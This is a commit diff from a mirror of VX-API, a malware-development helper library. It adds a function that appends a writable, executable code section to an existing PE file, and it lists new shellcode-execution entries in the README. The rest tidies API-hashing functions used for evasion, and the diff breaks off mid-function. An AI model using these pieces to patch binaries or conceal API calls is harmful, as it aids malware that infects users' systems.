mirror of https://github.com/vxunderground/VX-API
parent
c91d3da65e
commit
e56f07d798
15
README.md
15
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.559
|
||||
Version: 2.0.607
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -129,6 +129,9 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetCurrentProcessIdFromOffset | RistBS | Helper Functions |
|
||||
| GetPeBaseAddress | smelly__vx | Helper Functions |
|
||||
| LdrLoadGetProcedureAddress | c5pider | Helper Functions |
|
||||
| IsPeSection | smelly__vx | Helper Functions |
|
||||
| AddSectionToPeFile | smelly__vx | Helper Functions |
|
||||
| WriteDataToPeSection | smelly__vx | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
|
@ -191,6 +194,16 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs | Malcode |
|
||||
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs | Malcode |
|
||||
| MpfProcessInjectionViaProcessReflection | Deep Instinct | Malcode |
|
||||
| MpfSceViaImmEnumInputContext | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertFindChainInStore | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumPropsExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCreateThreadpoolWait | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCryptEnumOIDInfo | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaDSA_EnumCallback | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCreateTimerQueueTimer | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEvtSubscribe | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaFlsAlloc | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaInitOnceExecuteOnce | alfarom256, aahmad097 | Malcode |
|
||||
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
|
||||
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
|
||||
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |
|
||||
|
|
|
@ -0,0 +1,186 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD AlignSection(_In_ DWORD Size, _In_ DWORD Align, _In_ DWORD Address)
|
||||
{
|
||||
if (!(Size % Align))
|
||||
return Address + Size;
|
||||
|
||||
return Address + (Size / Align + 1) * Align;
|
||||
}
|
||||
|
||||
BOOL AddSectionToPeFileW(_In_ LPCWSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
LONGLONG SizeOfTargetBinary = 0L;
|
||||
|
||||
PBYTE FileBuffer = NULL;
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
PIMAGE_SECTION_HEADER Section = NULL;
|
||||
WORD Offset = ERROR_SUCCESS;
|
||||
|
||||
DWORD SectionCharacteristics = ERROR_SUCCESS;
|
||||
|
||||
WCHAR DisposeableObject[32] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(DisposeableObject, (PCHAR)SectionName, StringLengthA(SectionName)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if(IsPeSectionW(Path, DisposeableObject))
|
||||
return TRUE;
|
||||
|
||||
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)Path, FILE_ATTRIBUTE_NORMAL);
|
||||
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = CreateFileW(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
|
||||
if (FileBuffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Section = (PIMAGE_SECTION_HEADER)(FileBuffer + Dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));
|
||||
Offset = File->NumberOfSections;
|
||||
|
||||
RtlZeroMemory(&Section[Offset], sizeof(IMAGE_SECTION_HEADER));
|
||||
RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));
|
||||
|
||||
Section[Offset].Misc.VirtualSize = AlignSection(SectionSizeInBytes, Optional->SectionAlignment, 0);
|
||||
Section[Offset].VirtualAddress = AlignSection(Section[Offset - 1].Misc.VirtualSize, Optional->SectionAlignment, Section[Offset - 1].VirtualAddress);
|
||||
Section[Offset].SizeOfRawData = AlignSection(SectionSizeInBytes, Optional->FileAlignment, 0);
|
||||
Section[Offset].PointerToRawData = AlignSection(Section[Offset - 1].SizeOfRawData, Optional->FileAlignment, Section[Offset - 1].PointerToRawData);
|
||||
|
||||
SectionCharacteristics = IMAGE_SCN_MEM_WRITE |
|
||||
IMAGE_SCN_CNT_CODE |
|
||||
IMAGE_SCN_CNT_UNINITIALIZED_DATA |
|
||||
IMAGE_SCN_MEM_EXECUTE |
|
||||
IMAGE_SCN_CNT_INITIALIZED_DATA |
|
||||
IMAGE_SCN_MEM_READ;
|
||||
|
||||
|
||||
Section[Offset].Characteristics = SectionCharacteristics;
|
||||
|
||||
if (SetFilePointer(hHandle, Section[Offset].PointerToRawData + Section[Offset].SizeOfRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SetEndOfFile(hHandle))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Optional->SizeOfImage = Section[Offset].VirtualAddress + Section[Offset].Misc.VirtualSize;
|
||||
File->NumberOfSections += 1;
|
||||
|
||||
if (SetFilePointer(hHandle, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (FileBuffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL AddSectionToPeFileA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
LONGLONG SizeOfTargetBinary = 0L;
|
||||
|
||||
PBYTE FileBuffer = NULL;
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
PIMAGE_SECTION_HEADER Section = NULL;
|
||||
WORD Offset = ERROR_SUCCESS;
|
||||
|
||||
DWORD SectionCharacteristics = ERROR_SUCCESS;
|
||||
|
||||
if (IsPeSectionA(Path, SectionName))
|
||||
return TRUE;
|
||||
|
||||
SizeOfTargetBinary = GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL);
|
||||
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = CreateFileA(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
|
||||
if (FileBuffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Section = (PIMAGE_SECTION_HEADER)(FileBuffer + Dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));
|
||||
Offset = File->NumberOfSections;
|
||||
|
||||
RtlZeroMemory(&Section[Offset], sizeof(IMAGE_SECTION_HEADER));
|
||||
RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));
|
||||
|
||||
Section[Offset].Misc.VirtualSize = AlignSection(SectionSizeInBytes, Optional->SectionAlignment, 0);
|
||||
Section[Offset].VirtualAddress = AlignSection(Section[Offset - 1].Misc.VirtualSize, Optional->SectionAlignment, Section[Offset - 1].VirtualAddress);
|
||||
Section[Offset].SizeOfRawData = AlignSection(SectionSizeInBytes, Optional->FileAlignment, 0);
|
||||
Section[Offset].PointerToRawData = AlignSection(Section[Offset - 1].SizeOfRawData, Optional->FileAlignment, Section[Offset - 1].PointerToRawData);
|
||||
|
||||
SectionCharacteristics = IMAGE_SCN_MEM_WRITE |
|
||||
IMAGE_SCN_CNT_CODE |
|
||||
IMAGE_SCN_CNT_UNINITIALIZED_DATA |
|
||||
IMAGE_SCN_MEM_EXECUTE |
|
||||
IMAGE_SCN_CNT_INITIALIZED_DATA |
|
||||
IMAGE_SCN_MEM_READ;
|
||||
|
||||
|
||||
Section[Offset].Characteristics = SectionCharacteristics;
|
||||
|
||||
if (SetFilePointer(hHandle, Section[Offset].PointerToRawData + Section[Offset].SizeOfRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SetEndOfFile(hHandle))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Optional->SizeOfImage = Section[Offset].VirtualAddress + Section[Offset].Misc.VirtualSize;
|
||||
File->NumberOfSections += 1;
|
||||
|
||||
if (SetFilePointer(hHandle, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (FileBuffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
|
||||
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ LPCWSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
|
||||
{
|
||||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
@ -20,7 +20,7 @@ BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In
|
|||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ PCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
|
||||
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ LPCSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
|
||||
{
|
||||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#include "Win32Helper.h"
|
||||
#include <Wincrypt.h>
|
||||
|
||||
BOOL CreateMd5HashFromFilePathW(_In_ PWCHAR FilePath, _Inout_ PWCHAR Md5Hash)
|
||||
BOOL CreateMd5HashFromFilePathW(_In_ LPCWSTR FilePath, _Inout_ PWCHAR Md5Hash)
|
||||
{
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
HCRYPTPROV hProvider = NULL;
|
||||
|
@ -65,7 +65,7 @@ EXIT_ROUTINE:
|
|||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateMd5HashFromFilePathA(_In_ PCHAR FilePath, _Inout_ PCHAR Md5Hash)
|
||||
BOOL CreateMd5HashFromFilePathA(_In_ LPCSTR FilePath, _Inout_ PCHAR Md5Hash)
|
||||
{
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
HCRYPTPROV hProvider = NULL;
|
||||
|
|
|
@ -31,7 +31,7 @@ DWORD64 __stdcall GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcNam
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
@ -80,7 +80,7 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -33,7 +33,7 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
|
|||
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
|
||||
{
|
||||
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
|
||||
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
|
||||
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
|
||||
|
||||
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//NOTE: PULONG must be pointed to an array of ULONG integers e.g. ULONG FileHash[4] = { 0 };
|
||||
BOOL HashFileByMsiFileHashTableW(_In_ PWCHAR Path, _Inout_ PULONG FileHash)
|
||||
BOOL HashFileByMsiFileHashTableW(_In_ LPCWSTR Path, _Inout_ PULONG FileHash)
|
||||
{
|
||||
MSIGETFILEHASHW MsiGetFileHashW = NULL;
|
||||
MSIFILEHASHINFO Hash = { 0 };
|
||||
|
@ -40,7 +40,7 @@ EXIT_ROUTINE:
|
|||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL HashFileByMsiFileHashTableA(_In_ PCHAR Path, _Inout_ PULONG FileHash)
|
||||
BOOL HashFileByMsiFileHashTableA(_In_ LPCSTR Path, _Inout_ PULONG FileHash)
|
||||
{
|
||||
MSIGETFILEHASHA MsiGetFileHashA = NULL;
|
||||
MSIFILEHASHINFO Hash = { 0 };
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringDjb2A(_In_ PCHAR String)
|
||||
DWORD HashStringDjb2A(_In_ LPCSTR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
INT c = 0;
|
||||
|
@ -11,7 +11,7 @@ DWORD HashStringDjb2A(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
DWORD HashStringDjb2W(_In_ PWCHAR String)
|
||||
DWORD HashStringDjb2W(_In_ LPCWSTR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
INT c = 0;
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String)
|
||||
ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String)
|
||||
{
|
||||
ULONG Hash = 0x811c9dc5;
|
||||
|
||||
|
@ -13,7 +13,7 @@ ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
ULONG HashStringFowlerNollVoVariant1aW(_In_ PWCHAR String)
|
||||
ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String)
|
||||
{
|
||||
ULONG Hash = 0x811c9dc5;
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
|
||||
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ LPCSTR String)
|
||||
{
|
||||
SIZE_T Index = 0;
|
||||
UINT32 Hash = 0;
|
||||
|
@ -20,7 +20,7 @@ UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ PWCHAR String)
|
||||
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ LPCWSTR String)
|
||||
{
|
||||
SIZE_T Index = 0;
|
||||
UINT32 Hash = 0;
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringLoseLoseA(_In_ PCHAR String)
|
||||
DWORD HashStringLoseLoseA(_In_ LPCSTR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
INT c;
|
||||
|
@ -11,7 +11,7 @@ DWORD HashStringLoseLoseA(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
DWORD HashStringLoseLoseW(_In_ PWCHAR String)
|
||||
DWORD HashStringLoseLoseW(_In_ LPCWSTR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
INT c;
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
INT32 HashStringMurmurW(_In_ PWCHAR String)
|
||||
INT32 HashStringMurmurW(_In_ LPCWSTR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthW(String);
|
||||
UINT32 hash = 0;
|
||||
|
@ -57,7 +57,7 @@ INT32 HashStringMurmurW(_In_ PWCHAR String)
|
|||
return hash;
|
||||
}
|
||||
|
||||
INT32 HashStringMurmurA(_In_ PCHAR String)
|
||||
INT32 HashStringMurmurA(_In_ LPCSTR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthA(String);
|
||||
UINT32 hash = 0;
|
||||
|
|
|
@ -10,7 +10,7 @@ UINT32 HashStringRotr32SubA(UINT32 Value, UINT Count)
|
|||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
INT HashStringRotr32A(_In_ PCHAR String)
|
||||
INT HashStringRotr32A(_In_ LPCSTR String)
|
||||
{
|
||||
INT Value = 0;
|
||||
|
||||
|
@ -30,7 +30,7 @@ UINT32 HashStringRotr32SubW(UINT32 Value, UINT Count)
|
|||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
INT HashStringRotr32W(_In_ PWCHAR String)
|
||||
INT HashStringRotr32W(_In_ LPCWSTR String)
|
||||
{
|
||||
INT Value = 0;
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringSdbmA(_In_ PCHAR String)
|
||||
DWORD HashStringSdbmA(_In_ LPCSTR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
INT c;
|
||||
|
@ -11,7 +11,7 @@ DWORD HashStringSdbmA(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
DWORD HashStringSdbmW(_In_ PWCHAR String)
|
||||
DWORD HashStringSdbmW(_In_ LPCWSTR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
INT c;
|
||||
|
|
|
@ -21,11 +21,11 @@
|
|||
} while (0)
|
||||
|
||||
|
||||
INT32 HashStringSipHashW(_In_ PWCHAR String)
|
||||
INT32 HashStringSipHashW(_In_ LPCWSTR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthW(String);
|
||||
UINT64 hash = ((UINT64)Length) << 56;
|
||||
PWCHAR end = String + Length - (Length % sizeof(UINT64));
|
||||
PWCHAR end = (PWCHAR)String + Length - (Length % sizeof(UINT64));
|
||||
INT left = Length & 7;
|
||||
|
||||
|
||||
|
@ -93,11 +93,11 @@ INT32 HashStringSipHashW(_In_ PWCHAR String)
|
|||
}
|
||||
|
||||
|
||||
INT32 HashStringSipHashA(_In_ PCHAR String)
|
||||
INT32 HashStringSipHashA(_In_ LPCSTR String)
|
||||
{
|
